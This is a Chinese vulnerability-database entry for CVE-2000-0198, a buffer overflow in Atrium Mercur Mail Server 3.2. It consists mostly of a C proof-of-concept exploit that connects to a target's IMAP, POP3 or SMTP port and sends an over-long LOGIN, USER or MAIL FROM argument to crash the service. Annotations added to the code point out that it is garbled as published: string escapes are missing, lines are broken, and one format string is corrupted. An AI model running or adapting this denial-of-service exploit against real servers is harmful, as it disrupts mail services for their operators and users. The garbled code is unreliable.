Atrium Software Mercur Mail Server 3.2 多个缓冲区溢出漏洞

Atrium Software Mercur Mail Server 3.2 多个缓冲区溢出漏洞

漏洞ID 1105751 漏洞类型 缓冲区溢出
发布时间 2000-03-14 更新时间 2005-10-20
CVE编号 CVE-2000-0198
CNNVD-ID CNNVD-200003-031
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19806
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-031
|漏洞详情
MERCUR邮件服务器组中的POP3和IMAP存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞触发拒绝服务。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1051/info

Atrium Software Mercur is an SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles the SMTP "mail from" command, the POP3 "user" command and the IMAP "login" command. The application will crash if an overly long string is used as an argument to any of these commands.


 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

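/*
 * Print the command-line synopsis to stderr and terminate the process
 * with exit status 1.  Does not return.
 *
 * progname: program name shown in the synopsis (main passes argv[0]).
 *
 * The line breaks are written as "\n"; the listing as published had lost
 * the backslashes and would have printed a literal 'n' instead.
 */
void
usage (char *progname)
{
  fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
  fputs ("   Type:\n"
         "      0 - IMAP4 (Default)\n"
         "      1 - POP3\n"
         "      2 - SMTP\n\n", stderr);
  exit (1);
}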

/*
 * Proof-of-concept client for the denial of service described in the
 * advisory text above (CVE-2000-0198): it connects to one mail service on
 * the host named in argv[1] and sends a single command whose argument is
 * an over-long run of 'X' bytes.
 *
 *   argv[1]  target host name or dotted-quad address
 *   argv[2]  optional service selector: 1 = POP3 (port 110), 2 = SMTP
 *            (port 25), anything else = IMAP4 (port 143)
 *
 * Returns 0 after the data has been written and the socket closed, -1 on
 * a socket/resolve/connect/write/close error; usage() exits with 1.
 *
 * NOTE(review): the listing does not compile as published.  The escape
 * backslashes are missing from every string literal, two snprintf calls
 * are split by stray "=" line wraps, the MAIL FROM format string was
 * overwritten by the page's e-mail obfuscation, and memset/strlen/bzero
 * are used without <string.h>/<strings.h>.
 *
 * Defender's view: the whole request is one command line of roughly 2-3 KB.
 * RFC 1939 limits each POP3 argument to 40 characters and RFC 5321 (like
 * RFC 821 before it) limits an SMTP command line to 512 octets, so a
 * USER, LOGIN or MAIL FROM line of this size is a length anomaly that a
 * server should reject and that a network sensor can flag.
 */
int
main (int argc, char **argv)
{
  /* buffer holds the filler argument, remotedos the complete command line.
     aux is declared but never used. */
  char *ptr, buffer[3000], remotedos[3100];
  int aux, sock, type;
  struct sockaddr_in sin;
  unsigned long ip;
  struct hostent *he;

  fprintf (stderr,
   "n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-n");

  if (argc < 2)
    usage (argv[0]);

  /* Service selector; atol yields 0 for non-numeric text, which falls
     into the default (IMAP4) branches below. */
  type = 0;
  if (argc > 2)
    type = atol (argv[2]);

  /* Build the filler: byte 88 is ASCII 'X'.  Each branch zeroes a region
     first and then fills all but its last two bytes, so the result is a
     NUL-terminated string: 2046 bytes for POP3, sizeof (buffer) - 2 = 2998
     bytes for IMAP4 and SMTP. */
  ptr = buffer;
  switch (type)
    {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
    }

  bzero (remotedos, sizeof (remotedos));

  /* Wrap the filler in the command named by the advisory for the chosen
     protocol.  snprintf bounds the write to sizeof (remotedos). */
  switch (type)
    {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %srnrnrn", =
buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %[email protected]", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN =
%srnrnrn",
buffer);
      break;
    }

  if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      return -1;
    }

  /* Resolve argv[1] by name first, then fall back to parsing it as a
     dotted-quad address.
     NOTE(review): inet_addr reports failure with INADDR_NONE, not NULL,
     so the comparison below does not catch an unparsable address. */
  if ((he = gethostbyname (argv[1])) != NULL)
    {
      ip = *(unsigned long *) he->h_addr;
    }
  else
    {
      if ((ip = inet_addr (argv[1])) == NULL)
{
  perror ("inet_addr()");
  return -1;
}
    }

  /* NOTE(review): sin is filled field by field and never zeroed, so its
     padding bytes are indeterminate. */
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = ip;

  /* Well-known ports: 110 POP3, 25 SMTP, 143 IMAP4. */
  switch (type)
    {
    case 1:
      sin.sin_port = htons (110);
      break;
    case 2:
      sin.sin_port = htons (25);
      break;
    default:
      sin.sin_port = htons (143);
      break;
    }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    {
      perror ("connect()");
      return -1;
    }

  /* Progress banner only; nothing is read from the server at any point,
     so the service greeting is ignored. */
  switch (type)
    {
    case 1:
      fprintf (stderr, "nEngaged Mercur POP3... Sending data...n");
      break;
    case 2:
      fprintf (stderr, "nEngaged Mercur SMTP... Sending data...n");
      break;
    default:
      fprintf (stderr, "nEngaged Mercur IMAP4... Sending data...n");
      break;
    }

  /* Send the command in one write.
     NOTE(review): write returns a signed count that is compared with the
     unsigned strlen result, so a -1 error return converts to a large
     unsigned value and is not reported by this test. */
  if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
    {
      perror ("write()");
      return -1;
    }

  /* Fixed four-second pause before closing; the source gives no reason
     (presumably to let the data reach the server before the close). */
  sleep (4);

  fprintf (stderr, "Bye Bye baby!...nn");
  if (close (sock) < 0)
    {
      perror ("close()");
      return -1;
    }

  return (0);
}
|参考资料

来源:BID
名称:1051
链接:http://www.securityfocus.com/bid/1051
来源:NTBUGTRAQ
名称:20000314 Local/Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability
链接:http://archives.neohapsis.com/archives/ntbugtraq/current/0206.html
来源:BUGTRAQ
名称:20000314 Local/Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/current/0137.html
